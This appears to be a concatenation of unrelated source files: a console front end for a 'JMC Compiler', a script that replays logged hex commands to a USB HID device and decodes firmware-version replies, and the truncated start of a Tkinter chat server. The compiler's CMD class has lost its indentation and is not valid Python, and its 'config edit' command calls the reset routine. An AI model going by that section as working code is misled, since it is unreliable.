    """ANSI escape sequences used to color console output."""
    HEADER = '\033[1;33;40m'
    YELLOW = '\033[33;40m'
    INFO = '\033[94;40m'
    INPUT = '\033[96;40m'
    PURPLE = '\033[35;40m'
    FAIL = '\033[91;40m'
    FAIL_BOLD = '\033[1;91;40m'
    ENDC = '\033[0;0;40m'  # reset attributes, keep the black background
    EXIT = '\033[0;0;0m'  # full reset; printed at program exit
    NONE = '\033[0;37;40m'
def pprint(values, color: Colors = Colors.NONE):
    """Print *values* in the given ANSI color, then reset to the default color."""
    text = f"{color.value}{values}{Colors.ENDC.value}"
    print(text)
def get_input(prompt: str = "> ", color: Colors = Colors.INPUT) -> str:
    """Read a line from the user with a colored prompt, log it, and return it."""
    value = input(f"{color.value}{prompt}")
    # Reset the color after the user's (colored) input.
    print(Colors.ENDC.value, end="")
    logger.info(f"Input from user: {value}")
    return value
def press_enter(prompt: str, color: Colors = Colors.INPUT) -> None:
    """Block until the user presses Enter, showing *prompt* in color (input hidden)."""
    message = f"{color.value}{prompt}{Colors.ENDC.value}"
    getpass(message)
def error_report(error: Exception) -> None:
    """Print the exception's class name (bold) and its message in failure colors."""
    pprint(type(error).__name__, Colors.FAIL_BOLD)
    pprint(error, Colors.FAIL)
def main() -> None:
    """Entry point: load or interactively build the config, then run the command loop."""
    global config
    # Enables ANSI escape sequence processing on Windows consoles.
    os.system("")
    logger.info(f"Build-version: {VERSION}")
    pprint(' JMC Compiler\n', Colors.HEADER)
    pprint(f'Current Directory | {CWD}\n', Colors.YELLOW)
    if not (CWD/CONFIG_FILE_NAME).is_file():
        pprint(
            f'No confile file found, generating {CONFIG_FILE_NAME}...', Colors.INFO
        )
        # First run: interactively collect and validate each setting.
        while True:
            config["namespace"] = get_input(f"Namespace: ")
            if " " in config["namespace"] or "\t" in config["namespace"]:
                pprint("Invalid Namespace: Space detected.", Colors.FAIL)
                continue
            if config["namespace"] == "":
                pprint(
                    "Invalid Namespace: Namespace need to have 1 or more character.", Colors.FAIL
                )
                continue
            if not config["namespace"].islower():
                pprint("Invalid Namespace: Uppercase character detected.", Colors.FAIL)
                continue
            break
        config["description"] = get_input(f"Description: ")
        while True:
            config["pack_format"] = get_input(f"Pack Format: ")
            if not config["pack_format"].isdigit():
                pprint("Invalid Pack Format: Non integer detected.", Colors.FAIL)
                continue
            break
        while True:
            config["target"] = get_input(
                f"Main JMC file(Leave blank for default[main.jmc]): "
            )
            if config["target"] == "":
                # Blank answer: default to main.jmc next to the config file.
                config["target"] = (
                    CWD/'main.jmc'
                ).resolve().as_posix()
                break
            if not config["target"].endswith(".jmc"):
                pprint("Invalid path: Target file needs to end with .jmc", Colors.FAIL)
                continue
            try:
                config["target"] = Path(config["target"]).resolve().as_posix()
            except BaseException:
                pprint("Invalid path", Colors.FAIL)
                continue
            break
        while True:
            config["output"] = get_input(
                f"Output directory(Leave blank for default[current directory]): "
            )
            if config["output"] == "":
                config["output"] = CWD.resolve().as_posix()
                break
            try:
                output = Path(config["output"]).resolve()
                if output.is_file():
                    # NOTE(review): no `continue` here - a file path is warned
                    # about but still accepted; confirm whether intended.
                    pprint("Path is not a directory.", Colors.FAIL)
                config["output"] = output.as_posix()
            except BaseException:
                pprint("Invalid path", Colors.FAIL)
                continue
            break
        with (CWD/CONFIG_FILE_NAME).open('w') as file:
            dump(config, file, indent=2)
    else:
        with (CWD/CONFIG_FILE_NAME).open('r') as file:
            config = load(file)
    pprint("To compile, type `compile`. For help, type `help`", Colors.INFO)
    # Command loop: first word selects the CMD handler, the rest become args.
    while True:
        command = get_input().split()
        # NOTE(review): empty input makes command[0] raise IndexError (caught
        # by the crash handler in __main__) - confirm whether intended.
        {
            "cd": CMD.cd,
            "help": CMD.help,
            "exit": CMD.exit,
            "compile": CMD.compile,
            "log": CMD.log,
            "autocompile": CMD.autocompile,
            "config": CMD.config,
        }.get(command[0], CMD.default)(*command[1:])
class CMD:
event = threading.Event()
@classmethod
def default(cls, *arg):
pprint("Command not recognized, try `help` for more info.", Colors.FAIL)
@classmethod
def help(cls):
pprint("""Avaliable commands:
cd <path>: Change current directory
compile: Compile your JMC file(s)
autocompile <interval (second)>: Start automatically compiling with certain interval
log (debug|info): Create log file in output directory
log clear: Delete every log file inside log folder except latest
config reset: Delete the configuration file and restart the compiler
config edit: Override configuration file and bypass error checking
help: Output this message
exit: Exit compiler
""", color=Colors.YELLOW)
@classmethod
def cd(cls, *args):
if not args:
pprint("Usage: cd <path>", Colors.FAIL)
return
path = ' '.join(args)
try:
os.chdir(path)
global CWD
global LOG_PATH
CWD = Path(os.getcwd())
LOG_PATH = CWD/'log'
main()
except ValueError:
pprint("Invalid path", Colors.FAIL)
@classmethod
def exit(cls, *args):
exit(0)
@classmethod
def compile(cls, *args):
debug_compile = False
if args:
if len(args) == 1 and args[0] == 'debug':
debug_compile = True
pprint("DEBUG MODE", Colors.INFO)
else:
pprint("Usage: compile", Colors.FAIL)
return
pprint("Compiling...", Colors.INFO)
try:
start_time = perf_counter()
jmc.compile(config, debug=True)
stop_time = perf_counter()
pprint(
f"Compiled successfully in {stop_time-start_time} seconds", Colors.INFO)
except (
JMCSyntaxException,
JMCFileNotFoundError,
JMCDecodeJSONError,
JMCSyntaxWarning,
MinecraftSyntaxWarning,
JMCBuildError
) as error:
logger.debug(format_exc())
error_report(error)
except Exception as error:
logger.exception("Non-JMC Error occur")
error_report(error)
if debug_compile:
cls._log_debug()
cls._log_clear()
@classmethod
def autocompile(cls, *args):
if len(args) > 1 or len(args) == 0:
pprint("Usage: autocompile <interval (second)>", Colors.FAIL)
return
try:
interval = int(args[0])
except ValueError:
pprint("Invalid integer", Colors.FAIL)
return
except BaseException as error:
pprint(type(error).__name__, Colors.FAIL_BOLD)
pprint(error, Colors.FAIL)
if interval == 0:
pprint("Interaval cannot be 0 seconds", Colors.FAIL)
return
thread = threading.Thread(
target=lambda: cls._background(interval),
daemon=True
)
cls.event.clear()
thread.start()
press_enter("Press Enter to stop...\n")
pprint("Stopping...", Colors.INFO)
cls.event.set()
thread.join()
@classmethod
def _background(cls, interval: int):
while not cls.event.is_set():
logger.debug("Auto compiling")
cls.compile()
cls.event.wait(interval)
@classmethod
def config(cls, *args):
if not args:
pprint("Usage: config (reset|edit)", Colors.FAIL)
return
if args[0] == 'reset':
cls._config_reset()
elif args[0] == 'edit':
cls._config_reset()
else:
pprint("Usage: config (reset|edit)", Colors.FAIL)
return
@classmethod
def _config_reset(cls):
(CWD/CONFIG_FILE_NAME).unlink(missing_ok=True)
pprint("Resetting configurations", Colors.PURPLE)
print('\n'*5)
main()
@classmethod
def _config_edit(cls):
global config
pprint(f"""Edit configurations (Bypass error checking)
Type `cancel` to cancel
{NEW_LINE.join([f"- {key}" for key in config])}""", Colors.PURPLE)
key = get_input("Configuration: ")
if key not in config:
if key.lower() == 'cancel':
return
pprint("Invalid Key", Colors.FAIL)
cls._config_edit()
else:
pprint(f"Current {key}: {config[key]}", Colors.YELLOW)
config[key] = get_input("New Value: ")
with (CWD/CONFIG_FILE_NAME).open('w') as file:
dump(config, file, indent=2)
@classmethod
def log(cls, *args):
if len(args) > 1 or not args:
pprint("Usage: log (debug|info|clear)", Colors.FAIL)
return
if args[0] == 'debug':
cls._log_debug()
elif args[0] == 'info':
cls._log_info()
elif args[0] == 'clear':
cls._log_clear()
else:
pprint("Usage: log (debug|info|clear)", Colors.FAIL)
return
@classmethod
def _log_clear(cls):
    """Delete every .log file in the log folder except latest.log."""
    logger.info("Clearing logs")
    if not LOG_PATH.is_dir():
        logger.debug("Log folder not found")
        return
    for entry in LOG_PATH.iterdir():
        # Only plain *.log files are removed; latest.log is preserved.
        if entry.is_file() and entry.suffix == '.log' and entry.name != 'latest.log':
            entry.unlink()
@classmethod
def _log_debug(cls):
    """Write the compiler's debug log to a timestamped file and latest.log."""
    logger.info("Requesting debug log")
    LOG_PATH.mkdir(exist_ok=True)
    content = jmc.get_debug_log()
    stamped_name = datetime.now().strftime("JMC_DEBUG - %y-%m-%d %H.%M.%S.log")
    for target in (LOG_PATH / stamped_name, LOG_PATH / "latest.log"):
        with target.open('w+') as file:
            file.write(content)
@classmethod
def _log_info(cls):
    """Write the compiler's info log to a timestamped file and latest.log."""
    logger.info("Requesting info log")
    LOG_PATH.mkdir(exist_ok=True)
    content = jmc.get_info_log()
    stamped_name = datetime.now().strftime("JMC_INFO - %y-%m-%d %H.%M.%S.log")
    for target in (LOG_PATH / stamped_name, LOG_PATH / "latest.log"):
        with target.open('w+') as file:
            file.write(content)
if __name__ == '__main__':
    # Restore the terminal colour whatever way the process exits.
    atexit.register(lambda: print(Colors.EXIT.value, end=""))
    logger.info("Starting session")
    # main()
    # Crash loop: keep the CLI alive across unexpected errors so the user can
    # read the report and press Enter to get a fresh session.
    while True:
        try:
            main()
        except Exception as error:
            # Signal any auto-compile background thread to stop before reporting.
            CMD.event.set()
            pprint("Unexpected error causes program to crash", Colors.FAIL)
            pprint(type(error).__name__, Colors.FAIL_BOLD)
            pprint(error, Colors.FAIL)
            logger.critical("Program crashed")
            logger.exception("")
            press_enter("Press Enter to continue...")
|
lines_from_log.py | #!/usr/bin/python3
# file: C:\Work\Python\HID_Util\src\lines_from_log.py
# usage: user must have the file Log_in_YAT_format.txt to retrieve line by line and send
# commands with appropriate delay to the HID device
from binascii import hexlify
import sys
import argparse
import threading
from time import perf_counter as timer
from time import sleep
# NOTE: about include_dll_path for __init__.py error.
# You MUST include the next line when working with full project path structure
import include_dll_path
import hid
import os
import re
# VENDOR_ID = 0x24b3 # Simb
# PRODUCT_ID = 0x1005 # Simb MSP430 Controller
# USB\VID_2047&PID_0302&REV_0200
VENDOR_ID = 0x2047 # Texas Instruments
PRODUCT_ID = 0x0302 # Joystick.
PRODUCT_ID_JOYSTICK = 0x0302 # Joystick.
PRODUCT_ID_ROUTER = 0x0301 # Router
PRODUCT_ID_STATION = 0x0304
PRODUCT_ID_LAP_NEW_CAMERA = 0x2005
# 2021_01_24
# USB\VID_24B3&PID_2005&REV_0200
# 0x24B3 = 9395
# 0x2005 = 8197
# VENDOR_ID = 0x24b3 # Simb
# PRODUCT_ID = 0x2005 # LAP_NEW_CAMERA.
PRODUCT_ID_types = {
0x0302: "BOARD_TYPE: Joystick/Universal",
0x0301: "BOARD_TYPE: Router/Main",
0x0304: "BOARD_TYPE: STATION",
0x0303: "BOARD_TYPE: TOOLS_MASTER",
0x0305: "BOARD_TYPE: SUITE2PRIPH",
0x0306: "BOARD_TYPE: TOOLS_SLAVE",
0x0307: "BOARD_TYPE: GBU",
0x0308: "BOARD_TYPE: LAP camera",
0x2005: "BOARD_TYPE: PRODUCT_ID_LAP_NEW_CAMERA", #board type is enforced in FW (descriptors.h)
0x1965: "yosi"
}
FILE1_PATH = "log\hid_log.csv"
# if not os.path.exists('log'):
# os.makedirs('log')
# # file1 = None
# # open recording log file:
# filename = "\log_in_yat_format.txt"
# path = os.getcwd()+filename
YAT_format = open("C:\Work\Python\Parsing_Scripts\Log_in_YAT_format.txt")
# # file1 = open("C:\Work\Python\HID_Util\src\log\log.csv","w")
# # file1 = open(FILE1_PATH,"w")
# file1 = open("log\get_FW_version_2021_03_11__00_42.csv","w")
hid_util_fault = 0
print_every = 0
READ_SIZE = 64 # The size of the packet
READ_TIMEOUT = 2 # 2ms
WRITE_DATA = bytes.fromhex("3f3ebb00b127ff00ff00ff00ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
DEFAULT_WRITE_DATA = WRITE_DATA
WRITE_DATA_CMD_I = bytes.fromhex("3f3ebb00b127ff00ff00ff0049ff33ff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
# start streaming command:
# 3f 04 82 00 00
WRITE_DATA_CMD_START = bytes.fromhex("3f048200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
WRITE_DATA_CMD_START_ = bytes.fromhex("3f048200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
# start streaming command for station 0x303:
WRITE_DATA_CMD_START_0x304 = bytes.fromhex("3f048d00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
# Get Board Type command:
# 01h 00h 00h 01h
WRITE_DATA_CMD_GET_BOARD_TYPE = bytes.fromhex("3f040100000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
#.........................................................##........................................
WRITE_DATA_CMD_S = bytes.fromhex("3f3ebb00b127ff00ff00ff0053ff33ff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
# 'A' - keep Alive + fast BLE update (every 20 msec)
WRITE_DATA_CMD_A = bytes.fromhex("3f3ebb00b127ff00ff00ff0041ff33ff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
WRITE_DATA_CMD_GET_FW_VERSION = bytes.fromhex("3f040600000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
# WRITE_DATA_CMD_PRIME_KEEP_ALIVE = bytes.fromhex("3f040400000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
WRITE_DATA_CMD_PRIME_KEEP_ALIVE = bytes.fromhex("3f040400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
# moderate BLE update rate every 50 mSec by 'M' command
WRITE_DATA_CMD_M = bytes.fromhex("3f3ebb00b127ff00ff00ff004dff33ff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
# set_BSL_mode
# WRITE_DATA_CMD_B = bytes.fromhex("3f3eaa00b127ff00ff00ff004dff33ff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
#0xAA Run BSL
WRITE_DATA_CMD_B = bytes.fromhex("3f04aa00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
SLEEP_AMOUNT = 0.002 # Read from HID every 2 milliseconds
PRINT_TIME = 1.0 # Print every 1 second
# PRINT_TIME = 0.5 # Print every 0.5 second
#PRINT_TIME = 2 # Print every 2 second
START_INDEX = 2 + 4 # Ignore the first two bytes, then skip the version (4 bytes)
# ANALOG_INDEX_LIST = list(range(START_INDEX + 2, START_INDEX + 4 * 2 + 1, 2)) + [START_INDEX + 6 * 2,]
ANALOG_INDEX_LIST = list(range(START_INDEX + 2, START_INDEX + 8 * 2 + 1, 2))
# print("ANALOG_INDEX_LIST=",ANALOG_INDEX_LIST)
# ANALOG_INDEX_LIST= [8, 10, 12, 14, 16, 18, 20, 22]
LAP_ANALOG_INDEX_LIST = list(range(2,8 * 2 + 1, 2))
COUNTER_INDEX = 2 + 22 + 18 # Ignore the first two bytes, then skip XData1 (22 bytes) and OverSample (==XDataSlave1; 18 bytes)
CMOS_INDEX = 2 + 2 # maybe + 4???
# 0 1 2 3 4 5 6 7 8 9 1011
# Received data: b'3f26 00 00 00 00 0674fc41 3f4efc70 0033a4513c5a0101210001000000650000000000000000000000167f070dd7aee89baff63fedcfcccb763acf041b00000010'
# TORQUE INSERTION
def len_st(size):
    """Return *size* as a two-character, zero-padded hex string.

    The HID command layout is "3f" + <payload length byte> + payload, and the
    length byte is hexadecimal (the 64-byte stream packets start with "3f3e",
    0x3e == 62 payload bytes; the 4-byte commands start with "3f04").

    The previous implementation returned "0" + str(size) for size <= 10
    (a wrong three-character "010" for exactly 10) and the placeholder
    "77" for anything larger, marked "need to fix this one!!!".  Callers
    compare against "77" to flag a bad length, so that sentinel is kept
    for values that cannot fit in a single byte.
    """
    if 0 <= size <= 0xFF:
        return "%02x" % size
    return "77"  # out-of-range sentinel; callers treat "77" as "bad length"
# global variables
special_cmd = 0
root = None
def main_loop(device):
    """Drive the HID device until stopped.

    Per iteration: honour the pending one-shot command in the global
    `special_cmd` ('I' = start streaming, 'A' = keep-alive / replay the next
    line of the YAT-format log file with its recorded delays, 'B' = enter BSL
    and stop), then read one packet and print a sample of the telemetry.

    Exits when the BSL command is selected or the log replay reaches its
    1774-command limit.  Runs as a daemon thread started from main().
    NOTE(review): indentation was reconstructed from a flattened dump —
    nesting of some statements should be confirmed against the original file.
    """
    do_print = True
    print_time = 0.0
    time = timer()                     # shadows nothing here: `time` module is not imported by name
    handle_time = timer()
    write_time_capture = timer()       # NOTE(review): never read afterwards
    skip_write = 0                     # NOTE(review): never read afterwards
    prev_counter = 0
    send_stream_request_command_once = 1
    global special_cmd
    global WRITE_DATA
    d = 1000                           # inter-command delay in ms, updated from "Delay(...)" log lines
    i = 0                              # number of command lines sent from the log
    j = 1                              # printed line counter
    while True:
        # for line in YAT_format:
        # Reset the counter
        if (do_print):
            print_time = timer()
        # Write to the device
        # if send_stream_request_command_once == 1:
        # send_stream_request_command_once = 0
        # if PRODUCT_ID == PRODUCT_ID_LAP_NEW_CAMERA:
        # print("enforce streaming of data with command 0x82"
        # if device is attached enforce streaming of data.
        # device.write(WRITE_DATA_CMD_START)
        if special_cmd == 'I':
            # One-shot: start streaming (station boards use a different opcode).
            if PRODUCT_ID == PRODUCT_ID_STATION:
                WRITE_DATA = WRITE_DATA_CMD_START_0x304
            else:
                WRITE_DATA = WRITE_DATA_CMD_START
            device.write(WRITE_DATA)
            print("special_cmd Start")
            special_cmd = 0
        # elif special_cmd == 'S':
        # WRITE_DATA = WRITE_DATA_CMD_GET_BOARD_TYPE
        # device.write(WRITE_DATA)
        # print("special_cmd CMD_GET_BOARD_TYPE")
        # # print_flag = 1
        # special_cmd = 0
        elif special_cmd == 'A':
            # if PRODUCT_ID == PRODUCT_ID_LAP_NEW_CAMERA:
            if PRODUCT_ID in PRODUCT_ID_types:
                # Known board: replay the recorded YAT log, one line per loop pass.
                WRITE_DATA = WRITE_DATA_CMD_PRIME_KEEP_ALIVE
                # WRITE_DATA = WRITE_DATA_CMD_GET_FW_VERSION
                # print("special_cmd A -> WRITE_DATA_CMD_GET_FW_VERSION")
                # print("special_cmd A -> WRITE_DATA_CMD_PRIME_KEEP_ALIVE")
                # device.write(WRITE_DATA)
                WRITE_DATA = bytes.fromhex("3f040400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
                # print("WRITE_DATA: ", WRITE_DATA)
                line_cmd = "3f040400000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
                WRITE_DATA = bytes.fromhex(line_cmd)
                # print("WRITE_DATA: ", WRITE_DATA,len(WRITE_DATA))
                # print hex(int(string, base=16))
                # print( hex(WRITE_DATA[0]),WRITE_DATA[1],WRITE_DATA[2],WRITE_DATA[3])
                line = YAT_format.readline()
                # \!(Delay(175))
                if "Delay" in line:
                    # Extract all digits, e.g. "\!(Delay(175))" -> 175 ms.
                    digits = re.findall("\d", line)
                    delay = ''.join(digits)
                    d = int(delay)
                    print("delay: (", d, ") ms to next command")
                    # Sleep for delay/1000 seconds ---------------------------------------------------------------------
                    sleep(d/1000)
                    # ------------------------------------------------------------------------------------------
                if "h" in line:
                    # A "\h(...)" payload line: strip the wrapper, rebuild the
                    # 64-byte command (header "3f" + length + payload + 00 pad).
                    i = i + 1
                    # stop condition after 1774 commands from host
                    if i > 1773:
                        print(" reached 1774 commands from host!!!")
                        break
                    if j < 10:
                        print("line #:", j, ") ------------------------------------------------------")
                    elif j < 100:
                        print("line #:", j, ") -----------------------------------------------------")
                    elif j < 1000:
                        print("line #:", j, ") ----------------------------------------------------")
                    else:
                        print("line #:", j, ") ---------------------------------------------------")
                    j = j + 1
                    a = line
                    a = a.replace('\\h(', '')
                    a = a.replace(')', '')
                    print(a, end='')
                    b = a.replace(' ', '')
                    b = b.rstrip()
                    l = len(b)//2          # payload length in bytes (2 hex chars per byte)
                    # print(b,"len=",l,"len_st(l)",len_st(l))
                    if len_st(l) == "77":
                        print(" >>>>>>>>>>>>>>>>>>>>>>>>> bad length of payload ??????? >>>>>>>>>>>>>>>>>>>>>>>>>>>")
                    # b= "3f"+str(l)+b
                    b = "3f"+len_st(l)+b
                    len2 = len(b)//2
                    added_00 = "00"*(64-len2)  # pad to the fixed 64-byte report size
                    command = b + added_00
                    # uncomment next line if debugging is needed
                    # print(command)
                    # print(bytes.fromhex(command))
                    # print(WRITE_DATA)
                    device.write(bytes.fromhex(command))
                    # print(line)
            else:
                WRITE_DATA = WRITE_DATA_CMD_A
                print("special_cmd A -> keep Alive + fast BLE update (every 20 msec)")
                # special_cmd = 0
        # elif special_cmd == 'M':
        # WRITE_DATA = WRITE_DATA_CMD_M
        # print("special_cmd M -> moderate BLE update rate every 50 mSec")
        # special_cmd = 0
        elif special_cmd == 'B':
            WRITE_DATA = WRITE_DATA_CMD_B
            # device.write(WRITE_DATA)
            # print("special_cmd B -> set_BSL_mode --- this will stop HID communication with this GUI")
            print("WRITE_DATA: ", WRITE_DATA)
            special_cmd = 0
        # else:
        # WRITE_DATA = DEFAULT_WRITE_DATA
        if WRITE_DATA == WRITE_DATA_CMD_B:
            break
        cycle_time = timer() - time
        # print("cycle timer: %.10f" % cycle_time)
        # If not enough time has passed, sleep for SLEEP_AMOUNT seconds
        sleep_time = SLEEP_AMOUNT - (cycle_time)  # NOTE(review): computed but never used
        # Measure the time
        time = timer()
        # Sleep for delay/1000 seconds ---------------------------------------------------------------------
        # sleep(d/1000)
        # ------------------------------------------------------------------------------------------
        # Read the packet from the device
        value = device.read(READ_SIZE, timeout=READ_TIMEOUT)
        # Update the GUI
        if len(value) >= READ_SIZE:
            # save into file:
            # Each analog channel is a little-endian 16-bit value.
            analog = [(int(value[i + 1]) << 8) + int(value[i]) for i in LAP_ANALOG_INDEX_LIST]
            channel_0 = analog[0]
            channel_1 = analog[1]
            channel_2 = analog[2]
            channel_3 = analog[3]
            channel_4 = analog[4]
            counter = (int(value[COUNTER_INDEX + 1]) << 8) + int(value[COUNTER_INDEX])
            count_dif = counter - prev_counter
            #global file1
            #if count_dif > 1 :
            # L = [ str(counter),", ", str(clicker_analog), ", " , str(count_dif), " <<<<<--- " ,"\n" ]
            #else:
            # L = [ str(counter),", ", str(clicker_analog), ", " , str(count_dif), "\n" ]
            L = [ str(channel_0),", ", str(channel_1), ", " , str(channel_2),", " , str(channel_3),", " , str(channel_4), "\n" ]
            #file1.writelines(L)
            # no handler for keep alive
            handler(value, do_print=do_print)
            # print("Received data: %s" % hexlify(value))
            Handler_Called = (timer() - handle_time)
            if Handler_Called > 0.002 :
                # if Handler_Called > 0.02 :
                #print("handler called: %.6f" % Handler_Called)
                global print_every
                # Throttle console output: dump one packet every 500 slow handles.
                print_every = print_every + 1
                if print_every >= 500:
                    print_every = 0
                    print("time:", time, end="")
                    print(" Received data: %s" % hexlify(value))
                    # print("time: %.6f" % time)
                handle_time = timer()
            prev_counter = counter
        # Update the do_print flag
        do_print = (timer() - print_time) >= PRINT_TIME
def date2dec(x):
    """Render a byte as two hex digits; for BCD-encoded date bytes this
    yields the decimal-looking string (e.g. 0x21 -> "21")."""
    return format(x, "02x")
def handler(value, do_print=False):
    """Optionally echo the raw packet; decode it when it is an FW-version
    response (bytes 2..5 == 06 06 00 01)."""
    if do_print:
        print("Received data: %s" % hexlify(value))
    # parsing FW version response :
    is_fw_response = (value[2], value[3], value[4], value[5]) == (6, 6, 0, 1)
    if is_fw_response:
        print("FW friendly version: %s" % hexlify(value))
        # 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0
        # b'3f0a06060001 030004060321 d6bb2c3fc2b49c3fe877fecef602fffe5787dedfcf750cfb129efe7ffd7ed60daedefca4f9fff58efc5eb47c237eb5a93dd72f55'
        print("")
        print("FW version: "+str(value[6])+"." +str(value[7])+"." +str(value[8]))
        print("FW date : "+date2dec(value[9])+"/" +date2dec(value[10])+"/20" +date2dec(value[11]))
        print(" ")
        print(" Please press <Enter> to Exit")
    return # do without gui
PROGRESS_BAR_LEN = 300
LONG_PROGRESS_BAR_LEN = 590
def init_parser():
    """Build the argument parser: vendor/product ID pair or a device path."""
    parser = argparse.ArgumentParser(
        description="Read the HID data from target board.\nIf no argument is given, the program exits."
    )
    # (flags, dest, metavar, type, help) — all optional, all single-valued lists.
    option_specs = (
        (("-v", "--vendor"), "vendor_id", "VENDOR_ID", int,
         "connects to the device with the vendor ID"),
        (("-p", "--product"), "product_id", "PRODUCT_ID", int,
         "connects to the device with that product ID"),
        (("-a", "--path"), "path", "PATH", str,
         "connects to the device with the given path"),
    )
    for flags, dest, metavar, value_type, help_text in option_specs:
        parser.add_argument(
            *flags,
            dest=dest,
            metavar=metavar,
            type=value_type,
            nargs=1,
            required=False,
            help=help_text
        )
    return parser
def main():
    """Parse CLI args, open the HID device (explicit VID/PID, path, or by
    probing known product IDs), then run main_loop on a daemon thread while
    the main thread blocks on input() until the user presses Enter.

    NOTE(review): indentation reconstructed from a flattened dump — nesting
    of some statements should be confirmed against the original file.
    """
    global VENDOR_ID
    global PRODUCT_ID
    PATH = None
    # Parse the command line arguments
    parser = init_parser()
    args = parser.parse_args(sys.argv[1:])
    # Initialize the flags according from the command line arguments
    avail_vid = args.vendor_id != None
    avail_pid = args.product_id != None
    avail_path = args.path != None
    id_mode = avail_pid and avail_vid
    path_mode = avail_path
    default_mode = (not avail_vid) and (not avail_pid) and (not avail_path)
    # Path and ID selection are mutually exclusive; IDs must come as a pair.
    if (path_mode and (avail_pid or avail_vid)):
        print("The path argument can't be mixed with the ID arguments")
        return
    if ((not avail_path) and ((avail_pid and (not avail_vid)) or ((not avail_pid) and avail_vid))):
        print("Both the product ID and the vendor ID must be given as arguments")
        return
    if (default_mode):
        print("No arguments were given, defaulting to:")
        print("VENDOR_ID = %X" % VENDOR_ID)
        print("PRODUCT_ID = %X" % PRODUCT_ID)
        id_mode = True
    elif (id_mode):
        VENDOR_ID = args.vendor_id[0]
        PRODUCT_ID = args.product_id[0] #run over with 772 == 0x304
    elif (path_mode):
        PATH = args.path[0]
    else:
        raise NotImplementedError
    device = None
    try:
        if (id_mode):
            try:
                print("try with default device:")
                print("VENDOR_ID = %X" % VENDOR_ID)
                print("PRODUCT_ID = %X" % PRODUCT_ID)
                device = hid.Device(vid=VENDOR_ID, pid=PRODUCT_ID)
            except:
                print("wrong ID")
                print(" ")
            # 0x24B3 = 9395
            # 0x2005 = 8197
            # Fallback probe 1: Simb vendor, PIDs 0x2000..0x2006.
            for n in range(7):
                if device is None:
                    try:
                        # print("try with other device")
                        VENDOR_ID = 0x24b3  # Simb
                        PRODUCT_ID = 0x2000 + n  # LAP_NEW_CAMERA. is 0x2005
                        # print("VID = %X PID = %X " % VENDOR_ID, PRODUCT_ID)
                        print("try with PID = %X " % PRODUCT_ID)
                        # print("PRODUCT_ID = %X" % PRODUCT_ID)
                        device = hid.Device(vid=VENDOR_ID, pid=PRODUCT_ID)
                        # device = hid.Device(vid=0x24B3, pid=0x2005)
                        # print("success vid=0x24B3, pid=0x2005 !!")
                    except:
                        print("wrong ID2")
            # VENDOR_ID = 2047
            # PRODUCT_ID = 304
            # 0x2047 = 8263
            # 0x304 = 772
            # 0x0301 // Product ID (PID) - base for Prime products family
            # Fallback probe 2: Texas Instruments vendor, PIDs from 0x301 up.
            for n in range(len(PRODUCT_ID_types)):
                if device is None:
                    try:
                        # print("try with other device")
                        VENDOR_ID = 0x2047  # Texas Instrument
                        PRODUCT_ID = 0x301 + n  # BOARD_TYPE_MAIN is 0x301
                        print("try with PID = %X " % PRODUCT_ID)
                        device = hid.Device(vid=VENDOR_ID, pid=PRODUCT_ID)
                    except:
                        print("wrong ID2")
            if device is None:
                print("no device attached")
            else:
                print("VENDOR_ID = %X" % VENDOR_ID)
                print("PRODUCT_ID = %X" % PRODUCT_ID)
                if PRODUCT_ID in PRODUCT_ID_types:
                    print(PRODUCT_ID_types[PRODUCT_ID])
                global special_cmd
                # if PRODUCT_ID == PRODUCT_ID_LAP_NEW_CAMERA:
                if PRODUCT_ID in PRODUCT_ID_types:
                    # Known board: arm the keep-alive/replay path in main_loop.
                    special_cmd = 'A'
                    print("set in init: special_cmd = 'A'")
        elif (path_mode):
            device = hid.Device(path=PATH)
        else:
            raise NotImplementedError
        # Create thread that calls
        threading.Thread(target=main_loop, args=(device,), daemon=True).start()
        global WRITE_DATA
        if WRITE_DATA == WRITE_DATA_CMD_B:
            print("WRITE_DATA == WRITE_DATA_CMD_B")
            # print(" Recording Ended !!!")
        print(" ")
        # print(" Please press <Enter> to Exit")
        # Block here; main_loop is a daemon thread and dies with the process.
        input()
    finally:
        # global file1
        # file1.close() #to change file access modes
        YAT_format.close()
        if device != None:
            device.close()
if __name__ == "__main__":
main() |
Server_gui.py |
import socket
import time
from datetime import datetime
import threading
import tkinter
from tkinter import Scrollbar, Text, Entry, Button, font
from tkinter.constants import END, NS, VERTICAL
import sys
from threading import Thread, ThreadError
from win10toast import ToastNotifier
Notify = ToastNotifier()
class Server():
    """Tkinter chat-room server: accepts TCP clients and relays messages.

    Methods take no ``self`` and are invoked as ``Server.method`` (no
    instances are ever created).  They operate on module-level globals:
    CONNECTED (client sockets), PARTICIPANTS (display names), USERNAME,
    and the GUI widgets built in the ``__main__`` block.
    NOTE(review): indentation reconstructed from a flattened dump.
    """

    def unlock():
        """Start accepting clients; wired to the status button."""
        try:
            threading.Thread(target=Server.connection_manager).start()
        except :
            pass

    def update():
        """Refresh the status button with the user count every 5 seconds."""
        while True:
            Server.change_button(str(len(CONNECTED)) +
                ' USERS IN ROOM : ', 'light green')
            time.sleep(5)

    def close_app():
        """Notify every client the server is closing, then tear down the GUI."""
        try:
            for clients_list in CONNECTED:
                try:
                    clients_list.send(
                        bytes('SERVER WAS CLOSED BY THE HOST', 'utf-8'))
                except :
                    sys.exit()
            root.destroy()
            sys.exit()
        except :
            root.destroy()

    def pull_message():
        """Poll every connected client for incoming messages.

        A message that parses as an int is treated as "user #N left"; the
